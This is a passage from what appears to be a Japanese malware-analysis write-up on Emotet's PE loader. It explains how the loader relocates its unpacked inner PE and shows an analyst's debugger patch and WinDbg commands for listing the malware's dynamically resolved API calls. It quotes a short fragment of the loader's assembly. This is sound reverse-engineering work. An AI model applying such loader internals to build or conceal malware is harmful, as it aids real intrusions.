例えば、ASLR(Address Space Layout Randomization)の影響により、ImageOptionalHeader に 0x40000 と記されているが、実際には、0x60000 にロードされたプログラムがあると仮定します。このまま何もせず実行すると、そのプログラム内の即値指定を行う命令(例えば、静的変数の値を読み取る命令)が仮想アドレスの開始が 0x40000 であると仮定して書かれている為、即値指定の命令はアクセス違反や意図したアドレスとは異なるアドレスにアクセスしてしまうことになります。その様なことを防ぐ為、動的ローダーが、静的に定められた仮想アドレスと、実際のアドレスが異なる場合、その差分を即値指定のアドレスに適用するという処理を行います。

Emotet の PE ローダーの場合、今回解析した検体では、外側の PE には、ASLR が適用されない様になっていました。また、内側 PE も実際に新しいプロセス上のメモリに展開される訳ではないので、ASLR の影響は受けません。しかし、内側の実行ファイルを起動する際には、仮想アドレスがヒープ上に展開される為、内側の実行ファイルで静的に定められた仮想アドレスと異なるアドレスに、展開される可能性が非常に高いです。その場合、内側の PE の即値を必要とする命令が正しく機能する為に、本来 ASLR の処理で用いられる動的リロケーションの処理をローダーが実装しています。この様な処理は Emotet の技巧的な処理の 1 つの例といえるでしょう。

次に、この仕組みを利用した解析事例を以下に紹介します。

この PE ローダー以降の内部 PE の処理を追ってみるとわかりますが、内部 PE が Windows 標準で用意されている DLL 内の API を呼ぶ際に、全ての API の解決が動的に行われていることに気が付きます。その為、内側の PE のメモリ領域を切り出して静的に解析しても、呼び出している API を知ることは非常に手間がかかります(例えば、IDA Pro では、API 呼び出しが既に解決済みの場合のみ、WindowsAPI の呼び出しを静的に把握することができます)。実行が行われる処理に関しては動的に解析できる為、問題はありませんが、C&C サーバーとの通信等の処理次第では、呼ばれない API は動的に解析することはできません。ここで、このリロケーションの仕組みに着目します。実は、この検体の場合、API が動的に解決される際に、その呼び元のアドレスがこの動的リロケーションテーブルのエントリーを確認することで全てを確認することができます。リロケーションが必要なアドレスは、アドレスを即値指定する命令に含まれると記載しましたが、具体的には、それらの命令の中で、即値アドレスのロードを行って、そのアドレスに存在する命令に実行を移す call 命令(0xff 0x15 + 即値 4byte)に着目します。即値 4byte が.data 等、実行ファイルの ImageBase によって変化するアドレスを指している場合、このオペランド部分がリロケーションエントリーに存在します。

デバッガーで、PE ローダーに対して、リロケーションを行う処理の書き換えを行うことで、ロードされる内部 PE のメモリ上で、「0xff,0x15 + 即値アドレス」の命令のアドレス、その即値の値を記録します。

具体的には、上に添付した PE ローダーのアセンブリの

;; ******************************************************************
_29d:
    and     ecx,0FFFh
    ;; Type == 3(IMAGE_REL_BASED_HIGHLOW)の時、ebpを足し合わせ
    add     dword [ecx+esi],ebp
;; *******************************************************************

で囲まれた部分を以降で配置する命令への call 命令と call 以降の残りのバイトを nop 命令に書き換えます。

そして、以下のバイナリを PE ローダーの終了後のコード領域でコピー元の領域の内、コピー済みの不要な領域に貼り付けます。

00000000 <_payload_start>:
   0:   81 e1 ff 0f 00 00       and    $0xfff,%ecx
   6:   01 2c 31                add    %ebp,(%ecx,%esi,1)
   9:   66 81 7c 31 fe ff 15    cmpw   $0x15ff,-0x2(%ecx,%esi,1)
  10:   74 01                   je     13 <_b01>
  12:   c3                      ret

00000013 <_b01>:
  13:   01 2c 31                add    %ebp,(%ecx,%esi,1)
  16:   50                      push   %eax
  17:   53                      push   %ebx
  18:   b8 fc 07 13 02          mov    $0x21307fc,%eax
  1d:   83 00 10                addl   $0x10,(%eax)
  20:   8b 00                   mov    (%eax),%eax
  22:   89 f3                   mov    %esi,%ebx
  24:   01 cb                   add    %ecx,%ebx
  26:   89 18                   mov    %ebx,(%eax)
  28:   8b 1b                   mov    (%ebx),%ebx
  2a:   89 58 04                mov    %ebx,0x4(%eax)
  2d:   5b                      pop    %ebx
  2e:   58                      pop    %eax
  2f:   c3                      ret

ポイントは、cmpw $0x15ff,-0x2(%ecx,%esi,1)命令で、リロケーションが必要な即値アドレス(オペランド)のオペコードが、0xff 0x15 で始まる call 命令であるかどうかを確認している部分です。その場合には、命令のアドレスをその即値アドレスとともに、空いている領域に格納します。

b6fac2fc306b00ca44639f920d084c3414a150588aeefa2f837a5d0e20e9b4b5 の検体で確認した所、合計 223 の API 呼び出しが存在することが確認できました。

なお、即値アドレスの中身は内部 PE の.data セクションを指しますが、この時点では、.data セクションには何も入っていません。 .data セクションに使用する API のアドレスは内部 PE の処理中に、DLL 毎に行われている為、その処理が終わった後に、再度、上で処理をしたアドレスの一覧を確認すると、呼び出されていない API も含めて、動的に解決される API を取得することができます。

以下、WinDbg を使用した場合の API を取得する例です。

r $t0 = 先程確保した調査したいAPIのあるアドレス;
u poi(poi(@$t0));
r $t0 = @$t0 + 0x8;

この手法は、内部 PE を解析する際に、動的アドレスを一度に調べることができるので、解析を効率化できます。取得した全ての API に関してはこちらに掲載しませんが、C&C サーバーとのプロトコルを理解する為の CryptoAPI や通信する為の API の位置を特定することができました。